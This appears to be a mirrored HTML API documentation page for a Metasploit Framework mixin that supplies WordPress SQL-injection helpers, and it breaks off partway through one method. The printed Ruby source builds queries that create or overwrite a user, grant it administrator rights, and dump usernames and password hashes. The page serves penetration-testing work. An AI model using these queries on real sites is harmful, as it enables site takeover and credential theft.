adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/HTTP/Wordpress/SQLi.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

916 lines
44 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HTTP::Wordpress::SQLi
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HTTP::Wordpress::SQLi";
relpath = '../../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../_index.html">Index (S)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../HTTP.html" title="Msf::Exploit::Remote::HTTP (module)">HTTP</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Wordpress.html" title="Msf::Exploit::Remote::HTTP::Wordpress (module)">Wordpress</a></span></span>
&raquo;
<span class="title">SQLi</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HTTP::Wordpress::SQLi
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../../../SQLi.html" title="Msf::Exploit::SQLi (module)">SQLi</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http/wordpress/sqli.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module provides reusable SQLi (SQL Injection) helper functions for WordPress exploits in Metasploit Framework. These functions allow for actions such as creating new users, granting privileges, and dumping user credentials via SQL injection vulnerabilities in WordPress.</p>
<p>Usage:</p>
<pre class="code ruby"><code class="ruby">Include this module in your exploit or auxiliary module and use
the provided functions to simplify SQL injection logic.
</code></pre>
</div>
</div>
<div class="tags">
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_create_user-instance_method" title="#wordpress_sqli_create_user (instance method)">#<strong>wordpress_sqli_create_user</strong>(username, password, email) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Inject an user into the WordPress database, creating or updating an entry.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_get_users_credentials-instance_method" title="#wordpress_sqli_get_users_credentials (instance method)">#<strong>wordpress_sqli_get_users_credentials</strong>(count = 10) &#x21d2; Array&lt;Array&gt; </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Get users credentials from the wp_users table.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_grant_admin_privileges-instance_method" title="#wordpress_sqli_grant_admin_privileges (instance method)">#<strong>wordpress_sqli_grant_admin_privileges</strong>(username) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Grant admin privileges to the specified user by creating or updating the appropriate meta entry.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_identify_table_prefix-instance_method" title="#wordpress_sqli_identify_table_prefix (instance method)">#<strong>wordpress_sqli_identify_table_prefix</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Identify the table prefix for the WordPress installation.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_initialize-instance_method" title="#wordpress_sqli_initialize (instance method)">#<strong>wordpress_sqli_initialize</strong>(sqli) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Function to initialize the SQLi instance in the mixin.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../SQLi.html" title="Msf::Exploit::SQLi (module)">SQLi</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../SQLi.html#create_sqli-instance_method" title="Msf::Exploit::SQLi#create_sqli (method)">#create_sqli</a></span>, <span class='object_link'><a href="../../../SQLi.html#initialize-instance_method" title="Msf::Exploit::SQLi#initialize (method)">#initialize</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="wordpress_sqli_create_user-instance_method">
#<strong>wordpress_sqli_create_user</strong>(username, password, email) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Inject an user into the WordPress database, creating or updating an entry.</p>
<p>This method either creates a new user entry in the users table or updates an existing one. If the user already exists, their password, nicename, email, and display name will be updated. Otherwise, a new user will be created with the provided credentials and default values. The password is hashed using MD5 for compatibility with older WordPress versions.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>username</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The username for the new or updated user.</p>
</div>
</li>
<li>
<span class='name'>password</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The password for the new user (stored as an MD5 hash).</p>
</div>
</li>
<li>
<span class='name'>email</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The email for the new user.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 37</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_create_user'>wordpress_sqli_create_user</span><span class='lparen'>(</span><span class='id identifier rubyid_username'>username</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='comma'>,</span> <span class='id identifier rubyid_email'>email</span><span class='rparen'>)</span>
<span class='id identifier rubyid_query'>query</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;-SQL</span>
<span class='tstring_content'> INSERT INTO </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
SELECT &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;, MD5(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;), &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;, &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_email'>email</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;, user_registered, user_status, &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;
FROM </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users
WHERE NOT EXISTS (
SELECT 1 FROM </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users WHERE user_login = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;
)
LIMIT 1
ON DUPLICATE KEY UPDATE
user_pass = MD5(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;),
user_nicename = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;,
user_email = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_email'>email</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;,
display_name = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;
</span><span class='heredoc_end'> SQL
</span>
<span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_raw_run_sql'>raw_run_sql</span><span class='lparen'>(</span><span class='id identifier rubyid_query'>query</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} User &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; created or updated successfully.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="wordpress_sqli_get_users_credentials-instance_method">
#<strong>wordpress_sqli_get_users_credentials</strong>(count = 10) &#x21d2; <tt>Array&lt;Array&gt;</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Get users credentials from the wp_users table</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>count</span>
<span class='type'>(<tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>10</tt>)</em>
&mdash;
<div class='inline'>
<p>The number of users to retrieve (default: 10)</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array&lt;Array&gt;</tt>)</span>
&mdash;
<div class='inline'>
<p>Array of arrays containing user login and password hash</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 126</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_get_users_credentials'>wordpress_sqli_get_users_credentials</span><span class='lparen'>(</span><span class='id identifier rubyid_count'>count</span> <span class='op'>=</span> <span class='int'>10</span><span class='rparen'>)</span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>user_login</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>user_pass</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_data'>data</span> <span class='op'>=</span> <span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_columns'>columns</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_count'>count</span><span class='rparen'>)</span>
<span class='id identifier rubyid_table'>table</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='op'>::</span><span class='const'>Table</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Header</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Indent</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>4</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Columns</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_columns'>columns</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_loot_data'>loot_data</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_user'>user</span><span class='op'>|</span>
<span class='id identifier rubyid_table'>table</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_user'>user</span>
<span class='id identifier rubyid_loot_data'>loot_data</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Username: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>, Password Hash: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>\n</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_create_credential'>create_credential</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='label'>workspace_id:</span> <span class='id identifier rubyid_myworkspace_id'>myworkspace_id</span><span class='comma'>,</span>
<span class='label'>origin_type:</span> <span class='symbol'>:service</span><span class='comma'>,</span>
<span class='label'>module_fullname:</span> <span class='id identifier rubyid_fullname'>fullname</span><span class='comma'>,</span>
<span class='label'>username:</span> <span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>private_type:</span> <span class='symbol'>:nonreplayable_hash</span><span class='comma'>,</span>
<span class='label'>jtr_format:</span> <span class='const'><span class='object_link'><a href="../../../../../Metasploit.html" title="Metasploit (module)">Metasploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Metasploit/Framework.html" title="Metasploit::Framework (module)">Framework</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Metasploit/Framework/Hashes.html" title="Metasploit::Framework::Hashes (module)">Hashes</a></span></span><span class='period'>.</span><span class='id identifier rubyid_identify_hash'><span class='object_link'><a href="../../../../../Metasploit/Framework/Hashes.html#identify_hash-class_method" title="Metasploit::Framework::Hashes.identify_hash (method)">identify_hash</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='label'>private_data:</span> <span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>service_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WordPress</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>address:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>port:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>protocol:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>status:</span> <span class='const'><span class='object_link'><a href="../../../../../Metasploit.html" title="Metasploit (module)">Metasploit</a></span></span><span class='op'>::</span><span class='const'>Model</span><span class='op'>::</span><span class='const'>Login</span><span class='op'>::</span><span class='const'>Status</span><span class='op'>::</span><span class='const'>UNTRIED</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} Credential for user &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; created successfully.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Dumped user data:</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_line'>print_line</span><span class='lparen'>(</span><span class='id identifier rubyid_table'>table</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='id identifier rubyid_loot_path'>loot_path</span> <span class='op'>=</span> <span class='id identifier rubyid_store_loot'>store_loot</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>wordpress.users</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>text/plain</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='id identifier rubyid_loot_data'>loot_data</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>wp_users.txt</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WordPress Usernames and Password Hashes</span><span class='tstring_end'>&#39;</span></span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Loot saved to: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_loot_path'>loot_path</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Reporting host...</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_report_host'>report_host</span><span class='lparen'>(</span><span class='label'>host:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Reporting service...</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_report_service'>report_service</span><span class='lparen'>(</span>
<span class='label'>host:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>port:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>proto:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>name:</span> <span class='id identifier rubyid_fullname'>fullname</span><span class='comma'>,</span>
<span class='label'>info:</span> <span class='id identifier rubyid_description'>description</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Reporting vulnerability...</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_report_vuln'>report_vuln</span><span class='lparen'>(</span>
<span class='label'>host:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>port:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>proto:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>name:</span> <span class='id identifier rubyid_fullname'>fullname</span><span class='comma'>,</span>
<span class='label'>refs:</span> <span class='id identifier rubyid_references'>references</span><span class='comma'>,</span>
<span class='label'>info:</span> <span class='id identifier rubyid_description'>description</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Reporting completed successfully.</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_data'>data</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="wordpress_sqli_grant_admin_privileges-instance_method">
#<strong>wordpress_sqli_grant_admin_privileges</strong>(username) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Grant admin privileges to the specified user by creating or updating the appropriate meta entry.</p>
<p>This method either creates a new entry in the usermeta table or updates an existing one to grant administrator capabilities to the specified user. If the entry for the users capabilities already exists, it will be updated to assign administrator privileges. If the entry does not exist, a new one will be created.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>username</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The username of the user to grant privileges to.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
67
68
69
70
71
72
73
74
75
76
77
78
79</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_grant_admin_privileges'>wordpress_sqli_grant_admin_privileges</span><span class='lparen'>(</span><span class='id identifier rubyid_username'>username</span><span class='rparen'>)</span>
<span class='id identifier rubyid_admin_query'>admin_query</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;-SQL</span>
<span class='tstring_content'> INSERT INTO </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>usermeta (user_id, meta_key, meta_value)
SELECT ID, &#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>capabilities&#39;, &#39;a:1:{s:13:&quot;administrator&quot;;s:1:&quot;1&quot;;}&#39;
FROM </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users
WHERE user_login = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;
ON DUPLICATE KEY UPDATE
meta_value = &#39;a:1:{s:13:&quot;administrator&quot;;s:1:&quot;1&quot;;}&#39;
</span><span class='heredoc_end'> SQL
</span>
<span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_raw_run_sql'>raw_run_sql</span><span class='lparen'>(</span><span class='id identifier rubyid_admin_query'>admin_query</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} Admin privileges granted or updated for user &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="wordpress_sqli_identify_table_prefix-instance_method">
#<strong>wordpress_sqli_identify_table_prefix</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Identify the table prefix for the WordPress installation</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The detected table prefix</p>
</div>
</li>
</ul>
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt><span class='object_link'><a href="../../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">Failure::UnexpectedReply</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>If the table prefix could not be detected</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 85</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_identify_table_prefix'>wordpress_sqli_identify_table_prefix</span>
<span class='id identifier rubyid_indicator'>indicator</span> <span class='op'>=</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>0</span><span class='op'>..</span><span class='int'>19</span><span class='rparen'>)</span>
<span class='id identifier rubyid_random_alias'>random_alias</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>1</span><span class='op'>..</span><span class='int'>5</span><span class='rparen'>)</span>
